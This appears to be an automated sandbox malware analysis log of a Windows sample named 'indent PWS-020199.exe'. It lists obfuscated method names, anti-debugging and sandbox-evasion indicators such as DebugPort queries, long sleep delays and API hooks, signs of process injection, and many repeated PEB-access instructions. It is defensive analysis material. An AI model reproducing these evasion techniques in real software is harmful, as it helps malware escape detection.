            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, LwKIDL50g1puPD1nh8.csHigh entropy of concatenated method names: 'nwbA1aNLMN', 'Y61AGCabGr', 'N25AKFf9XW', 'qQQAuY052Y', 'fxZAZCYCUf', 'KtoAsgPSPZ', 'ElTA77VMRQ', 'aSOAtxbOmo', 'HYiAj1674B', 'tM1ATxHiwv'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, wJJGOwYdKbSmQA13Wr.csHigh entropy of concatenated method names: 'JCqwqtEevf', 'twww9WY2XD', 'IDLAD9bOei', 'RT0AEPV3WK', 'f4FwNWkCfT', 'yhnwHt7mEk', 'N9rwWhTi7F', 'ScZwLdigKL', 'nVHwJPR5G1', 'NYCwlnOZpb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, iR6tAtsgCB0s6FK2ok.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EbyYQqHuKJ', 'wZcY9LofV2', 'BspYzHeOvi', 'zvxpDhRdAW', 'tfGpE7BA7X', 'yw5pYKlKUs', 'V1epppZxfg', 'PEXXa6zPGJDgBwgLfk'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, bMPrPffQ9OiSRGiWPT.csHigh entropy of concatenated method names: 'Mkys1n8bPh', 'f42sKt9yGN', 'sQEsZlqxuT', 'dHkZ9Lpa1E', 'c7JZzwgFiv', 'jjfsDER1wR', 'uZgsEmO7EV', 'tDQsY4j9LG', 'AcRspngvsj', 'TlQsygp7fh'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WTZTT21bY9pi5y4yFY.csHigh entropy of concatenated method names: 'fJL2IGqrm', 'xXKUmHFNK', 'cNrdYW0sG', 'EEdBGpdHs', 'dH5FAx408', 'NuA5W64O5', 'QRSifEsxPhQ59SBFx6', 'FhlNtpcPcJN63rpKfm', 'SrjAtWEPj', 'k0skxk1lg'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, f8fMwD31ixQMxE585f.csHigh entropy of concatenated method names: 'ToString', 'ATaMN6uIVt', 'Wr5MimOZRQ', 'cHcMmCjno1', 'ulJM09xpPx', 'PROMCeTeBv', 'Px4M6b4oJo', 'EJoMSwRBfF', 'BPgMfTfXTT', 'YZIMns7qfb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, K6opXMcVRSp2cGSA44.csHigh entropy of concatenated method names: 'fpwshaRTpo', 'MfLsb46Odv', 'iNHs2JE8qO', 'zIwsUawuMe', 'SvUs38BMbT', 'R7jsdHwXCn', 'GI8sBmNrDk', 'FI0s4g7EyK', 'amZsFVV7je', 'fhgs5pBMVb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, fPtj7h4VVYYJfdoUsx.csHigh entropy of concatenated method names: 'mecrEBMGLO', 'kPYrptxieD', 'CUhry2llCj', 'I8Vr1dKUaL', 'tnErGgx0bO', 'RWRruCq6TH', 'QuNrZwaTG5', 'qUEAX3UVoh', 'D2KAqOqEMu', 'O38AQj7Y8E'
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netiougc.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: 1A10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: 3450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: 3310000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: B680000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: 7AC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Memory allocated: B680000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_0041CA6D rdtsc 2_2_0041CA6D
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\netiougc.exe Window / User API: threadDelayed 9781
            Source: C:\Users\user\Desktop\indent PWS-020199.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netiougc.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\indent PWS-020199.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052 Thread sleep count: 191 > 30
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052 Thread sleep time: -382000s >= -30000s
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052 Thread sleep count: 9781 > 30
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052 Thread sleep time: -19562000s >= -30000s
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe TID: 8064 Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\netiougc.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netiougc.exe Code function: 7_2_0322BF20 FindFirstFileW,FindNextFileW,FindClose, 7_2_0322BF20
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000330E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(K
            Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: D2KAqOqEMu
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905062970.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2313158392.00000175C218C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netiougc.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_004177A3 LdrLoadDll, 2_2_004177A3
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_01548158 mov eax, dword ptr fs:[00000030h] 2_2_01548158
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8550 mov eax, dword ptr fs:[00000030h]2_2_014B8550
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8550 mov eax, dword ptr fs:[00000030h]2_2_014B8550
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546500 mov eax, dword ptr fs:[00000030h]2_2_01546500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE5CF mov eax, dword ptr fs:[00000030h]2_2_014EE5CF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE5CF mov eax, dword ptr fs:[00000030h]2_2_014EE5CF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B65D0 mov eax, dword ptr fs:[00000030h]2_2_014B65D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA5D0 mov eax, dword ptr fs:[00000030h]2_2_014EA5D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA5D0 mov eax, dword ptr fs:[00000030h]2_2_014EA5D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC5ED mov eax, dword ptr fs:[00000030h]2_2_014EC5ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC5ED mov eax, dword ptr fs:[00000030h]2_2_014EC5ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B25E0 mov eax, dword ptr fs:[00000030h]2_2_014B25E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E4588 mov eax, dword ptr fs:[00000030h]2_2_014E4588
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2582 mov eax, dword ptr fs:[00000030h]2_2_014B2582
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2582 mov ecx, dword ptr fs:[00000030h]2_2_014B2582
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE59C mov eax, dword ptr fs:[00000030h]2_2_014EE59C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D45B1 mov eax, dword ptr fs:[00000030h]2_2_014D45B1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D45B1 mov eax, dword ptr fs:[00000030h]2_2_014D45B1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A456 mov eax, dword ptr fs:[00000030h]2_2_0156A456
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A645D mov eax, dword ptr fs:[00000030h]2_2_014A645D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D245A mov eax, dword ptr fs:[00000030h]2_2_014D245A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C460 mov ecx, dword ptr fs:[00000030h]2_2_0153C460
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC427 mov eax, dword ptr fs:[00000030h]2_2_014AC427
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B04E5 mov ecx, dword ptr fs:[00000030h]2_2_014B04E5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A49A mov eax, dword ptr fs:[00000030h]2_2_0156A49A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B64AB mov eax, dword ptr fs:[00000030h]2_2_014B64AB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153A4B0 mov eax, dword ptr fs:[00000030h]2_2_0153A4B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E44B0 mov ecx, dword ptr fs:[00000030h]2_2_014E44B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov esi, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov eax, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov eax, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01534755 mov eax, dword ptr fs:[00000030h]2_2_01534755
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E75D mov eax, dword ptr fs:[00000030h]2_2_0153E75D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0750 mov eax, dword ptr fs:[00000030h]2_2_014B0750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2750 mov eax, dword ptr fs:[00000030h]2_2_014F2750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2750 mov eax, dword ptr fs:[00000030h]2_2_014F2750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8770 mov eax, dword ptr fs:[00000030h]2_2_014B8770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC700 mov eax, dword ptr fs:[00000030h]2_2_014EC700
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0710 mov eax, dword ptr fs:[00000030h]2_2_014B0710
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E0710 mov eax, dword ptr fs:[00000030h]2_2_014E0710
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152C730 mov eax, dword ptr fs:[00000030h]2_2_0152C730
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC720 mov eax, dword ptr fs:[00000030h]2_2_014EC720
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC720 mov eax, dword ptr fs:[00000030h]2_2_014EC720
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov eax, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov ecx, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov eax, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BC7C0 mov eax, dword ptr fs:[00000030h]2_2_014BC7C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015307C3 mov eax, dword ptr fs:[00000030h]2_2_015307C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B47FB mov eax, dword ptr fs:[00000030h]2_2_014B47FB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B47FB mov eax, dword ptr fs:[00000030h]2_2_014B47FB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E7E1 mov eax, dword ptr fs:[00000030h]2_2_0153E7E1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155678E mov eax, dword ptr fs:[00000030h]2_2_0155678E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B07AF mov eax, dword ptr fs:[00000030h]2_2_014B07AF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015647A0 mov eax, dword ptr fs:[00000030h]2_2_015647A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CC640 mov eax, dword ptr fs:[00000030h]2_2_014CC640
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA660 mov eax, dword ptr fs:[00000030h]2_2_014EA660
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA660 mov eax, dword ptr fs:[00000030h]2_2_014EA660
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157866E mov eax, dword ptr fs:[00000030h]2_2_0157866E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157866E mov eax, dword ptr fs:[00000030h]2_2_0157866E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E2674 mov eax, dword ptr fs:[00000030h]2_2_014E2674
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2619 mov eax, dword ptr fs:[00000030h]2_2_014F2619
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E609 mov eax, dword ptr fs:[00000030h]2_2_0152E609
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B262C mov eax, dword ptr fs:[00000030h]2_2_014B262C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE627 mov eax, dword ptr fs:[00000030h]2_2_014CE627
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E6620 mov eax, dword ptr fs:[00000030h]2_2_014E6620
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8620 mov eax, dword ptr fs:[00000030h]2_2_014E8620
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA6C7 mov ebx, dword ptr fs:[00000030h]2_2_014EA6C7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA6C7 mov eax, dword ptr fs:[00000030h]2_2_014EA6C7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015306F1 mov eax, dword ptr fs:[00000030h]2_2_015306F1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015306F1 mov eax, dword ptr fs:[00000030h]2_2_015306F1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4690 mov eax, dword ptr fs:[00000030h]2_2_014B4690
